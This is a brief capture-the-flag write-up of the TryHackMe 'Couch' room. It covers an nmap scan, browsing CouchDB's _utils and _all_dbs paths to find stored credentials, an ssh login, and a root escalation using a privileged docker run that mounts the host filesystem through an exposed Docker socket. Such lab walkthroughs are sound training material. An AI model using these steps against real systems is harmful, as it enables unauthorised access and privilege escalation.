TryHackME: Couch
--
Today we will take a look at TryHackMe: Couch. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Questions:
- Scan the machine. How many ports are open?
- What is the database management system installed on the server?
- What port is the database management system running on?
- What is the version of the management system installed on the server?
You will find the answers to the first four questions during the network scan.
- Network scan
Command: nmap -p- -sV -sC -oN nmap/open — open 10.10.218.153
- What is the path for the web administration tool for this database management system?
This requires research.
Answer: _utils
- What is the path to list all databases in the web browser of the database management system?
When we look at the site I mentioned, we come across such a sentence.
“*/_all_dbs
**Returns a list of all the databases in the CouchDB instance.”
Answer: _all_dbs
- What are the credentials found in the web administration tool?
When we return to CouchDB, we see the secret folder. If we look at the content, we can find the username and password in passwordbackup.
- Ssh
Let’s connect to the server via ssh with the given credentials.
Command: ssh atena@10.10.218.153
- Escalate privileges
When we look at user logs, we come across such a command. Let’s use.
Command: cat .bash_history
Command: docker -H 127.0.0.1:2375 run — rm -it — privileged — net=host -v /:/mnt alpine
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”